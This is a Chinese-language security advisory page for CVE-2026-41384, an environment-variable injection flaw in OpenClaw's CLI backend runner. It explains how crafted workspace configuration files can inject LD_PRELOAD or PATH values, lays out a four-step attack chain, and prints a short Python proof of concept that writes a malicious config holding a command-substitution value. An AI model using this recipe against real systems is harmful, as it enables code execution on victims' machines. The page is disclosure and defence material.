IPBUF安全漏洞报告
English
CVE-2026-41384 CVSS 7.8 高危

CVE-2026-41384 OpenClaw环境变量注入漏洞

披露日期: 2026-04-28

漏洞信息

漏洞编号
CVE-2026-41384
漏洞类型
环境变量注入
CVSS评分
7.8 高危
攻击向量
本地 (AV:L)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
OpenClaw

相关标签

环境变量注入代码执行OpenClaw本地攻击

漏洞概述

OpenClaw在2026.3.24之前的版本中存在一个严重的安全漏洞,即CLI后端运行程序中的环境变量注入漏洞。该漏洞允许攻击者通过精心制作的工作区配置文件注入恶意环境变量。由于系统未能正确过滤配置输入,攻击者可以利用此漏洞在后端进程生成时植入任意环境变量,从而导致代码执行或敏感数据泄露。

技术细节

该漏洞源于OpenClaw CLI后端运行程序在处理工作区配置时的输入验证缺失。当用户加载工作区时,应用程序会解析配置文件并将其传递给后端进程。攻击者可以构造包含特定键值对的恶意配置文件(如JSON或YAML),这些键值对会被直接映射到子进程的环境变量中。例如,攻击者可以注入`LD_PRELOAD`环境变量以加载恶意共享库,或修改`PATH`环境变量以劫持命令执行路径。尽管攻击向量为本地(AV:L)且需要用户交互(UI:R),但无需认证即可利用。一旦利用成功,攻击者可获得高权限(C:H/I:H/A:H),完全控制受影响的系统环境。

攻击链分析

STEP 1
1. 准备阶段
攻击者创建包含恶意环境变量键值对的工作区配置文件(如 exploit_workspace.json)。
STEP 2
2. 投递阶段
攻击者诱导受害者使用该恶意配置文件初始化或加载 OpenClaw 工作区。
STEP 3
3. 利用阶段
OpenClaw CLI 后端运行程序解析配置时,将恶意变量注入到进程生成时的环境变量中。
STEP 4
4. 执行阶段
后端进程启动时加载恶意环境变量,执行攻击者指定的代码(如通过 LD_PRELOAD 或劫持 PATH),导致系统被入侵。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
# Proof of Concept for CVE-2026-41384 # Description: Create a malicious workspace configuration to inject environment variables. import json import os # Define a malicious payload to inject an environment variable # In a real attack, this might point to a malicious library or script malicious_env_var = { "EVIL_PAYLOAD": "$(whoami > /tmp/pwned.txt)" } # Construct the malicious workspace configuration structure workspace_config = { "workspace_name": "normal_workspace", "backend_config": { "runner_options": malicious_env_var } } # Write the malicious configuration to a file with open('exploit_workspace.json', 'w') as f: json.dump(workspace_config, f, indent=4) print("[+] Malicious workspace configuration generated: exploit_workspace.json") print("[+] When OpenClaw loads this configuration, the EVIL_PAYLOAD variable will be injected.") print("[+] This could lead to command execution depending on how the environment variables are used.")

影响范围

OpenClaw < 2026.3.24

防御指南

临时缓解措施
在未进行版本升级之前,建议用户严格审查所有工作区配置文件的内容,特别是涉及环境变量设置的部分。同时,应限制系统用户对 OpenClaw 配置目录的写入权限,以防止攻击者篡改现有配置。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表